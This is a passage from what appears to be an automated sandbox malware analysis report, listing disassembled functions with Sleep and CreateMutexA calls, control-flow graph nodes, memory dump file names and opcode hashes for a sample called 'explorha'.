                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 621844428-0
                                                                                                      • Opcode ID: 7a13616d52db20c0f6ec97a91895ba59b7a6c1b37aaddbae0466288564486ccc
                                                                                                      • Instruction ID: 3314becb221b1d5ab5fadead3eef19ed06151ed43c8d88402b6d46a3ef059042
                                                                                                      • Opcode Fuzzy Hash: 7a13616d52db20c0f6ec97a91895ba59b7a6c1b37aaddbae0466288564486ccc
                                                                                                      • Instruction Fuzzy Hash: 35E08C300551086FCF35BB58CC59E983B5DFF91360F180820F8458A221DF25ED42C680
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869675 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: 90f4060e9a532a49c4e951f6389f06a10192b6848312be6f63f7ca3307254e4f
                                                                                                      • Instruction ID: dcf1e10eb8de8def49b5768fbd45f7a9138936e1f3c345e13bbd8b514617e510
                                                                                                      • Opcode Fuzzy Hash: 90f4060e9a532a49c4e951f6389f06a10192b6848312be6f63f7ca3307254e4f
                                                                                                      • Instruction Fuzzy Hash: CD3148716102048BEF0CDF78DD88B6DBA6AFB85315F208219E454EB3D5DB7599808B52
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869A14 Relevance: 3.1, APIs: 2, Instructions: 128sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 22 869a14-869a34 26 869a36-869a42 22->26 27 869a62-869a7e 22->27 28 869a44-869a52 26->28 29 869a58-869a5f call 87ecf8 26->29 30 869a80-869a8c 27->30 31 869aac-869acb 27->31 28->29 34 86a3fb 28->34 29->27 36 869aa2-869aa9 call 87ecf8 30->36 37 869a8e-869a9c 30->37 32 869acd-869ad9 31->32 33 869af9-86a3e6 call 879750 31->33 38 869aef-869af6 call 87ecf8 32->38 39 869adb-869ae9 32->39 41 86a423-86a466 Sleep CreateMutexA 34->41 42 86a3fb call 8982fa 34->42 36->31 37->34 37->36 38->33 39->34 39->38 42->41
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: e58ce484589153393961cc69b821f065f29b346d11ffa0d5b9939791905a080e
                                                                                                      • Instruction ID: 7b35d2033c852c23333d38888b3378c233e5c5868b8e40af2d9ed15a7848c571
                                                                                                      • Opcode Fuzzy Hash: e58ce484589153393961cc69b821f065f29b346d11ffa0d5b9939791905a080e
                                                                                                      • Instruction Fuzzy Hash: 3D3168717141048BEF0CDBACDD88BACB7B6FB85315F248218E454EB3C5DB7599808752
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869B49 Relevance: 3.1, APIs: 2, Instructions: 127sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 53 869b49-869b69 57 869b97-869bb3 53->57 58 869b6b-869b77 53->58 61 869bb5-869bc1 57->61 62 869be1-869c00 57->62 59 869b8d-869b94 call 87ecf8 58->59 60 869b79-869b87 58->60 59->57 60->59 65 86a400 60->65 67 869bd7-869bde call 87ecf8 61->67 68 869bc3-869bd1 61->68 63 869c02-869c0e 62->63 64 869c2e-86a3e6 call 879750 62->64 70 869c24-869c2b call 87ecf8 63->70 71 869c10-869c1e 63->71 73 86a423-86a466 Sleep CreateMutexA 65->73 74 86a400 call 8982fa 65->74 67->62 68->65 68->67 70->64 71->65 71->70 74->73
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909850072.0000000000B79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_860000_explorha.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateMutexSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1464230837-0
                                                                                                      • Opcode ID: ca2c8a9ca9e3acf8a1f32f953cfda7077cecfef1ddb16be6ccb0e32c546527b4
                                                                                                      • Instruction ID: e46d16370f9c48a0b244c5309a4d1a746977bd8a9db7613352962f2e9b6a407f
                                                                                                      • Opcode Fuzzy Hash: ca2c8a9ca9e3acf8a1f32f953cfda7077cecfef1ddb16be6ccb0e32c546527b4
                                                                                                      • Instruction Fuzzy Hash: 7B3168717001088BEF0CDB6CDDC9BACB766FB85324F208219E454EB3C5CB75A9808756
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 00869C7E Relevance: 3.1, APIs: 2, Instructions: 126sleepsynchronizationCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 84 869c7e-869c9e 88 869ca0-869cac 84->88 89 869ccc-869ce8 84->89 90 869cc2-869cc9 call 87ecf8 88->90 91 869cae-869cbc 88->91 92 869d16-869d35 89->92 93 869cea-869cf6 89->93 90->89 91->90 94 86a405 91->94 98 869d37-869d43 92->98 99 869d63-86a3e6 call 879750 92->99 96 869d0c-869d13 call 87ecf8 93->96 97 869cf8-869d06 93->97 101 86a423-86a466 Sleep CreateMutexA 94->101 102 86a405 call 8982fa 94->102 96->92 97->94 97->96 105 869d45-869d53 98->105 106 869d59-869d60 call 87ecf8 98->106 102->101 105->94 105->106 106->99
                                                                                                      APIs
                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 0086A435
                                                                                                      • CreateMutexA.KERNELBASE(00000000,00000000,008C51D8), ref: 0086A453
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, Offset: 00860000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.1908516718.0000000000860000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908539379.00000000008C4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908614967.00000000008C9000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908639503.00000000008CB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908666440.00000000008D7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908905677.0000000000A26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908947164.0000000000A28000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A3D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909019326.0000000000A64000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909041175.0000000000A66000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909066570.0000000000A77000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909097528.0000000000A78000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909118676.0000000000A79000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909139368.0000000000A7A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909160458.0000000000A82000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909182278.0000000000A8D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909206448.0000000000AA2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909228002.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909251115.0000000000AAE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909272565.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909293257.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909313668.0000000000ABA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909339356.0000000000ACA000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909361135.0000000000ACB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909383236.0000000000AD8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909410409.0000000000ADD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909430576.0000000000ADE000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909451855.0000000000AE1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909471920.0000000000AE2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909493456.0000000000AEA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909516549.0000000000AFB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909535570.0000000000AFC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909557155.0000000000AFD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909578135.0000000000B02000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909605393.0000000000B25000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B26000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909625613.0000000000B31000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909680865.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909700828.0000000000B4B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909723050.0000000000B5F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909744180.0000000000B61000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909763962.0000000000B62000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909784689.0000000000B68000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909804883.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.1909827276.0000000000B77000.00000040.00000001.01000000.00000008.sdmpDownload File
